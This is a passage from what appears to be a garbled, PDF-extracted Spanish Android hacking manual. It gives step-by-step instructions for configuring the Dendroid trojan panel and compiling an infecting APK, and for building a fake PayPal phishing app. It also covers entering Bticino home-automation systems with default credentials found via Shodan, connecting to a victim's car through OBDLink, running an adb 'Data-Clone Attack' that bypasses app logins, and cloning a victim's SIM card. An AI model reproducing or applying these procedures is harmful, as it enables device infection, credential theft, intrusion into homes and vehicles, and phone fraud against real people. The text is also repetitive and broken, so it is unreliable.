Esto fue algo de lo que modificamos pero aun asi falta crear una base de datos y en esa base de datos un usuario para ingresarlo en en los codigos en “PHP” que tenemos para luego de esa forma establecer una conexión MySQL entre la base de datos y los PHP scripts que hemos ingresados.

1) 2) Ahora vamos a Cpanel Luego iremos a craer una base de datos y nos
1)
2)
Ahora vamos a Cpanel
Luego iremos a craer una base de datos y nos aparecera algo asi todo depende del tipo
de estilo o version de cpanel:
  • - Antes que todo crear la base de datos primera mente y luego crear el usuario para la base de datos-

Esto fue algo de lo que modificamos pero aun asi falta crear una base de datos
  • - Ahora creamos un usuario para la base de datos-

Una vez de haber creado el usuario le asignaremos los privillegios:

Una vez de haber creado el usuario le asignaremos los privillegios: Bien ahora el siguiente proceso

Bien ahora el siguiente proceso es ir al “PHPMYADMIN” e importar la base de datos .SQL que se encuentra en la carpeta de “OTHER Files”

Una vez de haber creado el usuario le asignaremos los privillegios: Bien ahora el siguiente proceso

Iremos a phpmyadmin escogemos una base de datos que hemos creado y seleccionamos ahora arriba en la parte superior derecha => nos dice IMPORTAR Clickeamos Alli y seleccionamos donde se encuentra el fichero y subimos el fichero luego se creara las tablas como la imagen que observamos en la imagen de arriba.

Ahora cuidado! Por que creamos la base de datos y usuaro pero no hemos asignado a cada una de ellas a el script PHP te aconsejo revisar cada PHP y ver si dispone de lo siguiente:

Como en el fichero config.php

$dbhost='Aca Pondras El Servidor MYSQL'; $dbname='El nombre de la base de datos'; $dbuser='El usuario Asignado durante la creacion de la base de datos'; $dbpass='La contraseña tambien asignada durante la creacion de la base de datos';

bien revisamos cada fichero haber si encontramos los datos que presentamos y que es importante tener en cuenta estos datos para la conexión entre el script y la base de datos.

Por

ultimo deberas subir

los ficheros

en

tu

servidor

ejemplo que

el servidor que estes

trabajando sea:

 

www.android.com subiremos los ficheros en ese enlace utilizando el cliente de zimbra y una vez que lo subas ya estaria listo para entrar al “SETUP” en el cual asignaremos un usuario y contraseña:

Iremos a phpmyadmin escogemos una base de datos que hemos creado y seleccionamos ahora arriba enwww.android.com subiremos los ficheros en ese enlace utilizando el cliente de zimbra y una vez que lo subas ya estaria listo para entrar al “SETUP” en el cual asignaremos un usuario y contraseña: " id="pdf-obj-38-43" src="pdf-obj-38-43.jpg">

Ahora no que mas que decir que darle en begin setup

Ahora no que mas que decir que darle en begin setup Agregamos los valores de 10

Agregamos los valores de 10 en la parte <= izquierda en la derecha agregamos como esta en la imagen agregamos un usuario y contraseña y presionamos en el boton verda de la parte inferior derecha.

Ahora no que mas que decir que darle en begin setup Agregamos los valores de 10

Una vez ya habra sido completado el proceso.

Luego finalizamos y entramos de nuevo en la parte principal y agregamos las credenciales de login:

Luego finalizamos y entramos de nuevo en la parte principal y agregamos las credenciales de login:

“usuario y contraseña como hemos escogido”

Luego finalizamos y entramos de nuevo en la parte principal y agregamos las credenciales de login:

Luego listo podemos entrar al panel administrativos de adminsitracion de troyanos.

Configuracion del software:

Bueno ahora para la configuracion en esta parte deberemos tener ECLIPSE y tambien SDK android.

Abrimos eclipse:

File

Import

ahora debemos especificar la carpeta de projecto que tenemos llamado Dendroid APK.

Ahora especificamos que ya es un projecto existente. Hubicamos la carpeta y clickeamos en aceptar.

Ahora especificamos que ya es un projecto existente.

Ahora especificamos que ya es un projecto existente. Hubicamos la carpeta y clickeamos en aceptar.

Hubicamos la carpeta y clickeamos en aceptar.

De igual manera aca finalizando. Bueno ya una vez abierto el projecto en la parte <=

De igual manera aca finalizando.

Bueno ya una vez abierto el projecto en la parte <= izquierda observaremos los ficheros que podemos modificar:

Bien de igualmanera podemos modificar los scripts a continuacion borraremos variables las variables se encuentra en

Bien de igualmanera podemos modificar los scripts a continuacion borraremos variables las variables se encuentra en DroidianService.java, dentro del paquete com.connect y en la carpeta src.

Llamados: encodedURL, backupURL y encodedPassword El valor de las variables lo borramos y lo dejamos como la imagen a continuacion:

Bien de igualmanera podemos modificar los scripts a continuacion borraremos variables las variables se encuentra en

Tambien observaremos lo siguiente y son encodedURL, backupURL y encodedPassword que se encuentran en bse64.

Luego entramos a la pagin http://crypo.in.ua/tools/eng_base64c.php que es una herramienta para cifrar y decrifrar ahora nos tocara cifrar la direccion de nuestra pagina web donde subimos los ficheros e instalamos.

Luego entramos a la pagin <a href=http://crypo.in.ua/tools/eng_base64c.php que es una herramienta para cifrar y decrifrar ahora nos tocara cifrar la direccion de nuestra pagina web donde subimos los ficheros e instalamos. Ahora presionamos en Encrypt: " id="pdf-obj-45-6" src="pdf-obj-45-6.jpg">

Ahora presionamos en Encrypt:

Luego entramos a la pagin <a href=http://crypo.in.ua/tools/eng_base64c.php que es una herramienta para cifrar y decrifrar ahora nos tocara cifrar la direccion de nuestra pagina web donde subimos los ficheros e instalamos. Ahora presionamos en Encrypt: " id="pdf-obj-45-10" src="pdf-obj-45-10.jpg">

Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL.

Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL. Para

Para la variable encodedPassword repetiremos el mismo paso, pero esta vez deberemos de cifrar la contraseña que pusimos a la hora de crear nuestro panel de control (aquella que cambiamos el valor de keylimepie luego nos quedra como en la imagen de arriba.

Ahora presionamos en file y “Export”.

Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL. Para

Ahora indicamos que quermeos la aplicación APK

Ahora indicamos que quermeos la aplicación APK A continuacion damos en siguiente luego nos saldra lo

A continuacion damos en siguiente luego nos saldra lo siguiente:

- Si ya tienes una contraseña presiona en “Create new keystore” luego en siguiente. Llenamos el
  • - Si ya tienes una contraseña presiona en “Create new keystore”

luego en siguiente.

Llenamos el formulario

- Si ya tienes una contraseña presiona en “Create new keystore” luego en siguiente. Llenamos el

Para culminar seleccionamos una carpeta donde queremos guardar la APK:

Y listo tendremos nuestra APK lista para infectar a dispositivos:

Y listo tendremos nuestra APK lista para infectar a dispositivos:

Y listo tendremos nuestra APK lista para infectar a dispositivos:

12APP INVENTOR CREANDO FAKE APP

12 APP INVENTOR CREANDO FAKE APP App inventor es un projecto de la universidad MIT parahttp://ai2.appinventor.mit.edu/ Creamos un projecto " id="pdf-obj-50-7" src="pdf-obj-50-7.jpg">

App inventor es un projecto de la universidad MIT para que sus estudiantes aprendan de crear aplicaciones de forma sencilla y lo mejor de ello es que te permite la descarga directa de la .apk.

Lo que se quiere hacer acá es impulsar el método de crear un phishing y hacerlo ejecutable desde el dispositivo android normalmente la aplicación no mostrar la dirección “web” desde donde nos conectamos y es una ventaja.

App inventor => crear un “iframe” con el vinculo falso de la pagina “Phishing”

App Inventor => utilizar un falso logo de una web bancaria o cualquier otra payment

Instrucción:

1)

Vamos a app inventor 2 > http://ai2.appinventor.mit.edu/

Creamos un projecto

12 APP INVENTOR CREANDO FAKE APP App inventor es un projecto de la universidad MIT parahttp://ai2.appinventor.mit.edu/ Creamos un projecto " id="pdf-obj-50-34" src="pdf-obj-50-34.jpg">

Una vez ya podremos editar y agregar lo que tendrá nuestra aplicación:

Una vez ya podremos editar y agregar lo que tendrá nuestra aplicación: En la parte inferior

En la parte inferior => derecha encontraremos con

Title: donde agregare ejemplo “paypal” que es el titulado donde dice screen 2 en la imagen que observas arriba.

Ahora arrastraremos en la parte <= izquierda en el menu al llamado “WebViever” este lo arrastramos hasta la pantalla

Una vez ya podremos editar y agregar lo que tendrá nuestra aplicación: En la parte inferior

En la parte derecha superior colocamos estos 2 en full parent y mas abajo en “HomeUrl” colocamos la direccion de nuestro phishing de paypal.

Ahora en componentes clicekamos en screen2. Y ahora vamos a agregar el logo:

Ahora en componentes clicekamos en screen2. Y ahora vamos a agregar el logo: En esta parte

En esta parte subimos una imagen cualquiera de paypal. Una vez ya terminado todo esto podemos compilar la aplicación falsa de paypal nuestra victima ejecutara la aplicación y de inmediato le pedira las credenciales tal como especifica tu phishing.

Ahora en componentes clicekamos en screen2. Y ahora vamos a agregar el logo: En esta parte

Presionamos en BUILD y generamos la App en APK y listo tu APK falsa de paypal.

13COMUNICACIÓN ANDROID CON DISPOSITIVOS DOMESTICOS

13 COMUNICACIÓN ANDROID CON DISPOSITIVOS DOMESTICOS Existen multiple aplicaciones que permiten tener control sobre distintos aparatos

Existen multiple aplicaciones que permiten tener control sobre distintos aparatos domesticos que pueden funcionar por una comunicación Wireless y muchos de ellos tambien pueden ser controlados por medio de un servidor con plataforma que podemos observar graficamente uno de los productos que conosco mas es Btcino durante las primeras pruebas de kelvinsecurity teniendo un remoto control sobre todo un hogar muchos clientes de esta empresa han notificado que algo extraño pasa en su hogar.

13 COMUNICACIÓN ANDROID CON DISPOSITIVOS DOMESTICOS Existen multiple aplicaciones que permiten tener control sobre distintos aparatos

Lo encontramos disponible para “Android” aunque su conexión via WIFI podria ser esta y no una conexión con peticion de credenciales como “User: Password:” como es la de btcino generalmente en un servidor con plataforma.

_bien vamos con los detalles del producto automatizado: „La gestión de la iluminación , El accionamiento

_bien vamos con los detalles del producto automatizado:

„La gestión de la iluminación , El accionamiento de persianas y/o cortinas eléctricas, ventiladores, aspiradores, etc

_estadísticas de servidor:

HTTP/1.1 302 Found

Date: Sat, 23 Jul 2016 15:14:35 GMT

Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/1.0.0d PHP/5.1.6 X-Powered-By: PHP/5.1.6 location: /iden.php Content-Length: 0

Content-Type: text/html

Infraestructura:

Content-Type: text/html Infraestructura: POR MEDIO DEL TOUCH EL OPERADOR PODR Á REALIZAR LAS MISMAS ACCIONES QUE

POR MEDIO DEL TOUCH EL OPERADOR PODRÁ REALIZAR LAS MISMAS ACCIONES QUE REALIZARA UN HACKER POR MEDIO DE UN SERVIDOR.

HACKER AUDITANDO EL SISTEMA:

1) RESPECTO AL SERVIDOR SU ENTRADA A LA PLATAFORMA DONDE NOS PIDE LAS CREDENCIALES POR MEDIO DEL PUERTO 80 SI HACEMOS UN URL FUZZ VEREMOS QUE NO NOS PROPORCIONARA INFORMACION CLARO NOS LANZARA UNOS CUANTOS DIRECTORIOS "INDEX OF" DONDE ESTA VINCULADO EL CONFIG ­ INSTALL ECT PERO NINGUN FORMATO SERA VISUALIZADO.

2) LAS CREDENCIALES SUELEN SER MUY SENCILLAS TE TRAEMOS UN LISTADO DE CONTRASEÑAS DEBILES Y CREEMOS QUE SON LAS MISMA QUE SE LE AGREGAN A BTICINO EN SU VERSION ANTIGUA.

>USER:USER

>USER:123456 >ADMIN:ADMIN >ROOT­123456

DIRECTORIOS:

2) LAS CREDENCIALES SUELEN SER MUY SENCILLAS TE TRAEMOS UN LISTADO DE CONTRASE Ñ AS DEBILES

Directories HTTP Code HTTP Reason /javascript/ 200 OK /lib/ 200 OK /styles/ 200 OK /language/ 200 OK /img/ 200 OK /cgi­bin/ 403 Forbidden

­­ SISTEMA DE CONTROL ­­

­­ SISTEMA DE CONTROL ­­ shodan: location: iden.php PROBLEMA PRINCIPAL Y VENTAJAS DE UN PIRATA: 1)

shodan: location: iden.php

PROBLEMA PRINCIPAL Y VENTAJAS DE UN PIRATA:

1) LA CONTRASEÑA DE FABRICA POR DEFECTO ES ADMIN:ADMIN ENTONCES AUNQUE SE LE AGREGUE UNA CONTRASEÑA ASIGNADA LA ADMIN;ADMIN SERA APROBADA COMO USUARIO CON PRIVILEGIOS.

2) CUALQUIERA QUE ENTRE A ESTE SISTEMA PODRIA TENER CONTROL DE EL HOGAR E INCLUSO LLAMADAS DE ESPERA TAMBIEN LA ILUMINACION PERSIANAS COMO LO HEMOS DICHO.

ESA FUE LA CONTRASE Ñ A Y AUN ASI ENTRAMOS CON "ADMIN:ADMIN" SALTEANDO LA ASIGNADA Y

ESA FUE LA CONTRASEÑA Y AUN ASI ENTRAMOS CON "ADMIN:ADMIN" SALTEANDO LA ASIGNADA Y ESTO FUNCIONA SOLO PARA VERSIONES ANTIGUAS DE BTICINO.

14CONTROLAR VEHICULO DESDE TU CELULAR CON OBDLINK LX BLUETOOTH

14C ONTROLAR VEHICULO DESDE TU CELULAR CON OBDL INK LX B LUETOOTH Ahora podemos controlar unhttps://www.amazon.com/gp/product/B00H9S71LW/ref=as_li_tl? ie=UTF8&camp=1789&creative=390957&creativeASIN=B00H9S71LW&linkCode=as2&tag=thedr oideffec-20 una de las cosas que traemos con el hacking en este producto es que nosotros teniendo lo siguiente: 1) Un ceular android 2) La aplicación OBDLink " id="pdf-obj-59-11" src="pdf-obj-59-11.jpg">

Ahora podemos controlar un auto con ayuda de OBD el cual es un producto valorado en 79$ dolares en amazon cuenta con una aplicación personalizada para iOS.

14C ONTROLAR VEHICULO DESDE TU CELULAR CON OBDL INK LX B LUETOOTH Ahora podemos controlar unhttps://www.amazon.com/gp/product/B00H9S71LW/ref=as_li_tl? ie=UTF8&camp=1789&creative=390957&creativeASIN=B00H9S71LW&linkCode=as2&tag=thedr oideffec-20 una de las cosas que traemos con el hacking en este producto es que nosotros teniendo lo siguiente: 1) Un ceular android 2) La aplicación OBDLink " id="pdf-obj-59-15" src="pdf-obj-59-15.jpg">

una de las cosas que traemos con el hacking en este producto es que nosotros teniendo lo siguiente:

1)

Un ceular android

2)

La aplicación OBDLink

3)

Conexión via Bluetooth conectarnos.

“con esto bastaria para scannear y buscar el dispositivo y

Ahora un ejemplo de la busqueda de la conexión de nuestro celular buscando un punto en comunicación via Bluetooth con el dispositivo en nuestro auto o en el autro de nuestra victima:

3) Conexión via Bluetooth conectarnos. “con esto bastaria para scannear y buscar el dispositivo y Ahora

Y activado observaremos un punto de conexión cercano con el auto:

3) Conexión via Bluetooth conectarnos. “con esto bastaria para scannear y buscar el dispositivo y Ahora

Abrimos la aplicación y preisonamos en conectar:

3) Conexión via Bluetooth conectarnos. “con esto bastaria para scannear y buscar el dispositivo y Ahora

Presionamos en conectar y establecemos conexión con el dispositivo al hardware instalado al vehiculo por medio de una conexión Bluetooth.

- Mapa grafico explicativo - Si no lo hemos dicho tambien existe una conexión entre la
  • - Mapa grafico explicativo -

- Mapa grafico explicativo - Si no lo hemos dicho tambien existe una conexión entre la

Si no lo hemos dicho tambien existe una conexión entre la aplicación a un red wifi y lo puedes hacer sencillamente desde la aplicación y tendras el mismo remoto control del vehiculo y visualizacion de estado de este.

Al pesar de los problemas de conexión WiFi a un individuo con la aplicación y que camine por la calle y se encuentre con esta red WiFi protegida por WPA2 todos los dispositivos utilizan una misma contraseña:

- Mapa grafico explicativo - Si no lo hemos dicho tambien existe una conexión entre la

Observamos en el hardware donde dice la contraseña de esta red:

Observamos en el hardware donde dice la contraseña de esta red: 15A TACAR APLICACIONES ANDROID CON

15ATACAR APLICACIONES ANDROID CON DATA-CLONE- ATTACKMETODO

Observamos en el hardware donde dice la contraseña de esta red: 15A TACAR APLICACIONES ANDROID CON

Un 0day investiado por SuperHei lo llamo “Data-clone-Attack” se puede omitir la autenticación de contraseña, cuando el usuario de inicio de sesión de la aplicación y ajuste "recordar contraseña" algunas aplicaciones es definir.

Procedimiento De Ensayo:

1. abierto dos emulador. > adb devices Lista de dispositivos conectados

dispositivo emulador-5554 dispositivo emulador-5556

dispositivo emulador-5554 dispositivo emulador-5556 ambos dispositivos se instalan (https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, se pueden utilizar otras aplicaciones para probar.

ambos dispositivos se instalan

(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, se pueden utilizar otras aplicaciones para probar.

también

dispositivo emulador-5554 dispositivo emulador-5556 ambos dispositivos se instalan (https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, se pueden utilizar otras aplicaciones para probar.

2)

iniciar sesión en la aplicación "emulador-5554" y asegúrese de elegir el "recordar

contraseña". a continuación, tire de los datos de la aplicación en el PC. Vamos a la terminal de nuevo: escribimos:

>adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab pull: building file list ...

3) empujar los datos a "emulador-5556" >adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/ 4) -adb shell "emulador-5556"

3) empujar los datos a "emulador-5556" >adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/

3) empujar los datos a "emulador-5556" >adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/ 4) -adb shell "emulador-5556"

4)

-adb shell "emulador-5556"

>adb -s emulator-5556 shell

# ls -l /data/data/ ls -l /data/data/ drwxr-x--x app_1

app_1

drwxr-x--x app_35

app_35

2012-09-24 02:43 com.android.htmlviewer 2012-12-06 07:17 com.tencent.mobileqq

y obtener el propietario com.tencent.mobile qq es "app_35". Debido a que los datos de empuje es root.

# ls -l /data/data/com.tencent.mobileqq ls -l /data/data/com.tencent.mobileqq

drwxrwxr-x root

root

2012-12-06 07:17 shared_prefs

drwxrwxr-x root

root

2012-12-06 07:16 databases

drwxrwx--x app_35

app_35

2012-12-06 07:10 cache

drwxrwx--x app_35

app_35

2012-12-06 07:16 files

drwxr-xr-x system

system

2012-12-06 07:17 lib

por lo que necesitamos a chown:

# cd /data/data/com.tencent.mobileqq

cd /data/data/com.tencent.mobileqq # chown app_35 * chown app_35 * # ls -l ls -l

drwxrwxr-x app_35

root

2012-12-06 07:17 shared_prefs

drwxrwxr-x app_35

root

2012-12-06 07:16 databases

drwxrwx--x app_35

app_35

2012-12-06 07:10 cache

drwxrwx--x app_35

app_35

2012-12-06 07:16 files

drwxr-xr-x app_35

system

2012-12-06 07:17 lib

pluma de la aplicación en "emulador-5556", y

"emulador-5556".

tienen ingrese en el qq com.tencent.mobile en

Cómo obtener el contenido de los datos: es clave para la realización del ataque. algunos como esto:

Ya tiene privilegios de super

bajo el intérprete de comandos como la demo, u puede eludir la autenticación de contraseña utilizada "Data-Clone Attack".

(Cross-site-scriptin en Android) app + webview + xss(or webkit xcs vul) = "Data-Clone"

En la versión anterior de Android, aplicaciones o XSS webkit androide xcs vul puede leer el contenido del archivo local de:

http://www.80vul.com/android/android-0days.txt

Ventaja:

En la versión anterior de Android, aplicaciones o XSS webkit androide xcs vul puede leer el

Así vista web de la aplicación tiene los permisos de archivos de lectura a los datos de la aplicación. cuando un usuario de la aplicación visite un enlace URL, se pueden clonar los datos.

16CLONANDO SIM EL SIM DE TU VICTIMA

En la versión anterior de Android, aplicaciones o XSS webkit androide xcs vul puede leer el

Ha sido un trabajo para el area de delitos informaticos en multiples sedes de todo el mundo donde los agentes policiales del equipo de delitos informaticos aplican las tecnicas forenses

informaticas pero todo con la finalidad de recolectar informacion en los siguientes componentes del hardware:

1)

SIM

2)

SD

3)

Unidades Flash

4)

Memoria Interna y secundaria.

SIM :tiene un algoritmo para autentificar al subcriptor en la red y el numero de telefono.

 

Acceso SIM:

1) El acceso se realiza mediante una clave PIN

2) Cuando la SIM redcibe eneria, lo primero que solicita es el PIN que desbloquea el acceso logico al contenido de la tarjeta

3)

Sin

el

pin de acceso

logico

a

la

tarjeta

no es factible.

es

predeterminada que la tarjeta no presente PIN.

posible aunque no de forma

CLONANDO UNA SIM:

informaticas pero todo con la finalidad de recolectar informacion en los siguientes componentes del hardware: 1)

HARDWARE:

GRABADORA DE PIC TIPO LUDIPIPO GRABADORA EEPROM TARJETA CON MICROPROCESADOR DONDE GRABA. SE UTILIZA EN TARJETAS COOLWAFER

SOFTWARE:

SIM SCAN: PERMITE OBTENER LOS CODIGOS IMSI Y KI

ICPRO: GRABA EL PIC

WINEXPLORER: GRABA LA EEPROM

ICCID:CIRCUITO INTEGRADO DE IDENTIFICACION IMSI:SUBSCRIBER IDENTIFICADOR

QUE TIENE LA SIM COMO TAL:

1)

MENSAJES RECIBIDOS

2)

NUMEROS DE TELEFONOS

3)

ULTIMAS LLAMADAS

PROCESO DE CLONACION SIM:

G RABADORA DE PIC TIPO LUDIPIPO G RABADORA EEPROM T ARJETA CON MICROPROCESADOR DONDE GRABA .

NECESITAMOS UN SIM CARD READER PARA INSERTAR LA SIM DE LA VICTIMA Y LO PODEMOS CONSEGUIR EN VENTA EN ALIBABA LO PUEDES CONSGUIR EN LA SIGUIENTE DIRECCION:

HTTPS://WWW.ALIBABA.COM/SHOWROOM/SIM-CARD-READER-WRITER.HTML

REQUERIMOS:

1)

TARJETA SIM EN BLANCO

2)

LECTOR DE TARJETA SIM

3) SOFTWARE PARA GENERAR EL CONTENIDO DE SIM EN BLANCO PROCESO:

1) QUITAR LA SIM DE SU TELÉFONO, LO COLOCA EN EL LECTOR DE TARJETAS SIM LEER EL CÓDIGO DE KI Y EL IMSI LEER LA TARJETA SIM PARA KI Y EL IMSI UTILIZANDO EL SOFTWARE LA ESCRITURA EN LA TARJETA EN BLANCO

NECESITAMOS UN SIM CARD READER PARA INSERTAR LA SIM DE LA VICTIMA Y LO PODEMOS CONSEGUIR

1) PONER LA TARJETA EN BLANCO EN EL LECTOR 2) SELECCIONE ESCRITURA PARA SIM

3)

SELECCIONAR EL ARCHIVO .DAT A AHORRAR ANTES

4) SE LLEVARÁ UNOS 10 MINUTOS PARA ESCRIBIR

FINALIZANDO : “SU TARJETA ES CLONADA

F INALIZANDO : “S U TARJETA ES CLONADA ” S I INTENTA HACER 2 LLAMADAS AL

SI INTENTA HACER 2 LLAMADAS AL MISMO TIEMPO, UNO VA A IR A TRAVÉS DE, EL OTRO DIRÁ LLAMADA FALLA, Y AMBOS LOS TELÉFONOS TENDRÁN LOS MISMOS MENSAJES, TEXTO Y VOZ, Y AMBOS RECIBIRÁN LAS MISMAS LLAMADAS, PERO SÓLO UNO PUEDE HABLAR A LA VEZ.

F INALIZANDO : “S U TARJETA ES CLONADA ” S I INTENTA HACER 2 LLAMADAS AL